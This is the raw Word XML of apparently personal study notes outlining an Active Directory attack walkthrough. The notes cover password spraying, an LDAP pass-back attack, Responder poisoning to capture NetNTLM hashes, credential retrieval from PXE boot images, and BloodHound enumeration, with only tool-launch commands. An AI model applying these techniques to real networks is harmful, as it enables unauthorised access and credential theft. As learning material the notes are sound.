    <w:p w14:paraId="445B79D9" w14:textId="77777777" w:rsidR="00D41030" w:rsidRDefault="00D41030" w:rsidP="00D41030"/>
    <w:p w14:paraId="30F0A857" w14:textId="77777777" w:rsidR="00D41030" w:rsidRDefault="00D41030" w:rsidP="00D41030"/>
    <w:p w14:paraId="39FCFF90" w14:textId="77777777" w:rsidR="00D41030" w:rsidRPr="004126A1" w:rsidRDefault="00D41030" w:rsidP="00D41030"/>
    <w:p w14:paraId="3ECBDA49" w14:textId="081E1D31" w:rsidR="002C6748" w:rsidRDefault="002C6748" w:rsidP="002C6748">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Walk through</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007E6B02" w14:textId="401F3C81" w:rsidR="00281D45" w:rsidRDefault="00281D45" w:rsidP="00281D45">
      <w:r w:rsidRPr="002960F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Breaching</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (try to find anything to get initial access)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561A57BA" w14:textId="1CA9A1B9" w:rsidR="00281D45" w:rsidRDefault="00281D45" w:rsidP="00281D45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Recon (Osint &amp; phishing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AAE46F" w14:textId="1C97AFB1" w:rsidR="00281D45" w:rsidRDefault="00281D45" w:rsidP="00281D45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Broke NTLM Authentication (brute Force, Password Spray “hydra tool”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBB4DFD" w14:textId="09563742" w:rsidR="00281D45" w:rsidRDefault="00281D45" w:rsidP="00281D45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">LDAP </w:t>
      </w:r>
      <w:r w:rsidRPr="00281D45">
        <w:t>Pass-back Attack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on LDAP Bind Credentials</w:t>
      </w:r>
      <w:r w:rsidR="00B57E44">
        <w:t xml:space="preserve"> (access domain service from domain account)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5483BC2A" w14:textId="18A7C718" w:rsidR="00281D45" w:rsidRDefault="00281D45" w:rsidP="00281D45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Authentication Relays </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Brocke the NTLM Authentication between services or devices in the environment (</w:t>
      </w:r>
      <w:r w:rsidRPr="00281D45">
        <w:t>NTLM Challenges can be intercepted</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and may cracked), </w:t>
      </w:r>
      <w:r w:rsidRPr="00281D45">
        <w:t>Responder to attempt to intercept the NetNTLM challenge to crack it</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ( Responder </w:t>
      </w:r>
      <w:r w:rsidRPr="00281D45">
        <w:t>poison any  Link-Local Multicast Name Resolution (LLMNR),  NetBIOS Name Service (NBT-NS), and Web Proxy Auto-Discovery (WPAD) requests that are detected</w:t>
      </w:r>
      <w:r w:rsidR="00B57E44">
        <w:t xml:space="preserve"> (using joined domain account)</w:t>
      </w:r>
      <w:r w:rsidRPr="00281D45">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF5E7C1" w14:textId="540A5F76" w:rsidR="00281D45" w:rsidRDefault="00B57E44" w:rsidP="00B57E44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Get credentials or configurations from </w:t>
      </w:r>
      <w:r w:rsidR="00281D45" w:rsidRPr="00281D45">
        <w:t>PXE Boot Image Retrieval</w:t>
      </w:r>
      <w:r w:rsidR="00281D45">
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">BCD files on </w:t>
      </w:r>
      <w:r w:rsidRPr="00B57E44">
        <w:t>MDT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> server (using joined domain account).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50348762" w14:textId="1AFEEB5E" w:rsidR="00B57E44" w:rsidRPr="00281D45" w:rsidRDefault="00B57E44" w:rsidP="00B57E44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Configuration Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704AB51D" w14:textId="2ABDCF03" w:rsidR="002C6748" w:rsidRDefault="002C6748" w:rsidP="00385468">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C63A8F5" w14:textId="77777777" w:rsidR="002960F3" w:rsidRPr="002960F3" w:rsidRDefault="002960F3" w:rsidP="002960F3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002960F3">
        <w:t>Enumeration through Microsoft Management Console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06559434" w14:textId="77777777" w:rsidR="002960F3" w:rsidRPr="002960F3" w:rsidRDefault="002960F3" w:rsidP="002960F3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002960F3">
        <w:t>Enumeration through Command Prompt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C233029" w14:textId="77777777" w:rsidR="002960F3" w:rsidRPr="002960F3" w:rsidRDefault="002960F3" w:rsidP="002960F3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002960F3">
        <w:t>Enumeration through PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFB6140" w14:textId="77777777" w:rsidR="002960F3" w:rsidRPr="002960F3" w:rsidRDefault="002960F3" w:rsidP="002960F3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002960F3">
        <w:t>Enumeration through Bloodhound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CE8B40" w14:textId="3C44FA8C" w:rsidR="002960F3" w:rsidRPr="002960F3" w:rsidRDefault="002960F3" w:rsidP="002960F3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002960F3">
        <w:lastRenderedPageBreak/>
        <w:t>PowerView</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2489AC64" w14:textId="4BB58CEC" w:rsidR="00244110" w:rsidRPr="00244110" w:rsidRDefault="002960F3" w:rsidP="002960F3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002960F3">
        <w:t>Windows Management Instrumentation (WMI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD430D0" w14:textId="2E128908" w:rsidR="002C6748" w:rsidRDefault="002C6748" w:rsidP="00385468">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Initial Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8A83B0" w14:textId="11B849DB" w:rsidR="002C6748" w:rsidRDefault="002C6748" w:rsidP="00385468">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6628FDFC" w14:textId="77777777" w:rsidR="00385468" w:rsidRDefault="00385468" w:rsidP="00385468">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D899A20" w14:textId="146BB5EC" w:rsidR="00244110" w:rsidRDefault="00244110" w:rsidP="00244110">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rStyle w:val="Heading3Char"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Heading3Char"/>
        </w:rPr>
        <w:t>Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9CD991" w14:textId="07C43874" w:rsidR="00573669" w:rsidRDefault="00573669" w:rsidP="00573669">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>SharpHound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C732D61" w14:textId="04F68A29" w:rsidR="00573669" w:rsidRPr="00573669" w:rsidRDefault="00573669" w:rsidP="00573669">
      <w:r>
        <w:tab/>
        <w:t>To get info about the AD that will be Graphed using Bloodhound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B57035" w14:textId="011F01A4" w:rsidR="00573669" w:rsidRPr="00573669" w:rsidRDefault="00573669" w:rsidP="00573669">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00573669">
        <w:rPr>
          <w:rStyle w:val="Heading4Char"/>
        </w:rPr>
        <w:t>Bloodhound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBAD213" w14:textId="1EF645BC" w:rsidR="00244110" w:rsidRDefault="00244110" w:rsidP="004E0874">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Graph the Domain Environment (take information from bloodsharp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371A58B3" w14:textId="256F9D44" w:rsidR="004E0874" w:rsidRDefault="004E0874" w:rsidP="004E0874">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004E0874">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>neo4j console start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB96C9E" w14:textId="646204E8" w:rsidR="004E0874" w:rsidRDefault="004E0874" w:rsidP="004E0874">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004E0874">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bloodhound --no-sandbox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A55190" w14:textId="13889757" w:rsidR="00385468" w:rsidRDefault="00244110" w:rsidP="00573669">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Responder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E54666B" w14:textId="36DA4A2D" w:rsidR="00385468" w:rsidRDefault="00244110" w:rsidP="00244110">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00244110">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>intercept the NetNTLM challenge to crack it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4977D8BB" w14:textId="15C257C7" w:rsidR="00244110" w:rsidRDefault="00244110" w:rsidP="00244110">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="194E1613" w14:textId="77777777" w:rsidR="00385468" w:rsidRDefault="00385468" w:rsidP="00385468">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EA60AEF" w14:textId="77777777" w:rsidR="00385468" w:rsidRDefault="00385468" w:rsidP="00385468">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="612343AD" w14:textId="77777777" w:rsidR="00385468" w:rsidRDefault="00385468" w:rsidP="00385468">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08CCA0CE" w14:textId="77777777" w:rsidR="00385468" w:rsidRDefault="00385468" w:rsidP="00385468">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C375AAC" w14:textId="77777777" w:rsidR="00385468" w:rsidRDefault="00385468" w:rsidP="00385468">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="123B8420" w14:textId="77777777" w:rsidR="00385468" w:rsidRDefault="00385468" w:rsidP="00385468">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4682F479" w14:textId="77777777" w:rsidR="00385468" w:rsidRDefault="00385468" w:rsidP="00385468">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26E0588F" w14:textId="07B22006" w:rsidR="00385468" w:rsidRPr="000B55A0" w:rsidRDefault="00385468" w:rsidP="00385468">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00385468" w:rsidRPr="000B55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DFD9" w14:textId="77777777" w:rsidR="00073711" w:rsidRDefault="00073711" w:rsidP="00F61A2B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2786C6AD" w14:textId="77777777" w:rsidR="00073711" w:rsidRDefault="00073711" w:rsidP="00F6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Ubuntu">
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>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B997D" w14:textId="77777777" w:rsidR="00073711" w:rsidRDefault="00073711" w:rsidP="00F61A2B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3FD8F47E" w14:textId="77777777" w:rsidR="00073711" w:rsidRDefault="00073711" w:rsidP="00F6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27F2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="632E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51A33"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A26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32539"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7DB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626E7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="18BEA800"/>
    <w:lvl w:ilvl="0" w:tplc="926CDB92">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1B1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="140ED4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E243340"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B6DC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8710C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="78C20A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2C6CFB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="391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35AAE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FAD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A0547E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7F7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F42C3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EDEE8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35BF2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3ADA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27CD3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="195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B911C3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4E86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613303"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="70D86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FF1DDB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3AF4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359E9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="19D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D7C92"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="671AE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14F67"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CC6242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25F57142"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5D865EC4"/>
    <w:lvl w:ilvl="0" w:tplc="2F66CA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8547C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D71E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A66BAA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="437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358EE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FAB2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B142C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1458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20838"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="11C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121F5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F768F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B034AD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="323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3C1297"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A49C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3A0F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="327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E334C9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7C4A9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C67A07"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="52B8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D906C2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E72A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FE6B56"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FBF69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BC37D6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8616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02472"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A5B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E4C67"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A3DA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F756BA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A80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E1E62"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="921CA7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FFE0199"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1DF25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07B4DE5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FA00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643719"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F460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D3420A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6694D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EF6F08"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A7B65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6635D1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="86C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782A58"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5A2E17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5A610A06"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6E48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F50500"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="123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A80D03"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A5DA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CB2846"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="758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CD7759"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AD9E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693D8C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D40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985055"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="38D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17396"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2E0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D91DF6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5846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66797C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9438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D75E32"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FCF4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A17550F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C78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31E9B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8D709E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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="70B64368"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="53045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0E66EEB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="087A81C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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7114550B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F8BA9198"/>
    <w:lvl w:ilvl="0" w:tplc="2F66CA4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EC64E7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="63A6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0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Aptos" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Apto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4812D7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="099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EC2183"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B98E16D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7ED179D0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F1B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41D38"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="536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5145325">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="788401639">
    <w:abstractNumId w:val="60"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1146583189">
    <w:abstractNumId w:val="55"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="239026803">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1993168711">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="2081714499">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="316495789">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="583683792">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1443374751">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="327710122">
    <w:abstractNumId w:val="53"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="180362856">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="605502866">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="942539120">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1991014738">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1448962618">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1780833171">
    <w:abstractNumId w:val="61"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="2005352451">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="451676047">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="918709014">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1750343021">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1835610140">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="419060523">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1468858442">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="141123642">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="659768468">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="470830462">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="618494017">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1855683125">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="2119988095">
    <w:abstractNumId w:val="52"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="1205829211">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="226185826">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="611935254">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="1781487561">
    <w:abstractNumId w:val="51"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="719209360">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="79179879">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="682248367">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="349379166">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="1074205722">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="2046982293">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="40" w16cid:durableId="985665134">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="41" w16cid:durableId="4089361">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="42" w16cid:durableId="804540594">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="43" w16cid:durableId="1359236872">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="44" w16cid:durableId="1030842446">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="45" w16cid:durableId="486828636">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="46" w16cid:durableId="1068066677">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="47" w16cid:durableId="1884169584">
    <w:abstractNumId w:val="50"/>
  </w:num>
  <w:num w:numId="48" w16cid:durableId="367223101">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="49" w16cid:durableId="1065879138">
    <w:abstractNumId w:val="65"/>
  </w:num>
  <w:num w:numId="50" w16cid:durableId="1021131454">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="51" w16cid:durableId="561328538">
    <w:abstractNumId w:val="54"/>
  </w:num>
  <w:num w:numId="52" w16cid:durableId="1521629984">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="53" w16cid:durableId="1644390725">
    <w:abstractNumId w:val="62"/>
  </w:num>
  <w:num w:numId="54" w16cid:durableId="1024861087">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="55" w16cid:durableId="829365169">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="56" w16cid:durableId="850602028">
    <w:abstractNumId w:val="59"/>
  </w:num>
  <w:num w:numId="57" w16cid:durableId="648746948">
    <w:abstractNumId w:val="56"/>
  </w:num>
  <w:num w:numId="58" w16cid:durableId="593780971">
